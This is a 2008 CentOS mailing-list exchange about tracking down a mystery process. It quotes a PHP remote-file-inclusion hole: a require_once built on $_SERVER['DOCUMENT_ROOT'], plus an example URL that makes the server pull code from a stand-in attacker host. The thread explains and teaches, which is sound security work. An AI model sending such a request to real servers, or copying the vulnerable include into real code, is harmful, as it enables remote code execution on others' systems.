[CentOS] mystery process "unit"

Tue Aug 12 17:39:32 UTC 2008
Jeff Kinz <jkinz at kinz.org>

On Tue, Aug 12, 2008 at 12:28:08PM -0400, sbeam wrote:
> On Tuesday 12 August 2008 12:18, Rainer Duffner wrote:
> > (I think it requires both register_globals and allow_url_fopen to be on,
> > but I'm not sure if you can't get it to work with only allow_url_fopen....)
> 
> as I just found out, it can, as long as the PHP developer was even more naive 
> than usual. The offending line was:
> 
> require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php");
> 
> then a request like:
> 
> http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysit
> e.es/bot.txt
> 
> will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php", which is good 
> enough.
> 
> And yeah this works with register_globals off, which surprised me. And also 
> surprised that mod_security has no problem with that URL. I am going to raise 
> the issue with them.

Hi Sam, Nice job tracking that down, and evenm nicer, explaining it with an 
example even. 

If you don't mind I would like to use it as a real world example for a
class I'm teaching?  I will remove all the identifying information
first of course.

Thanks, 
Jeff Kinz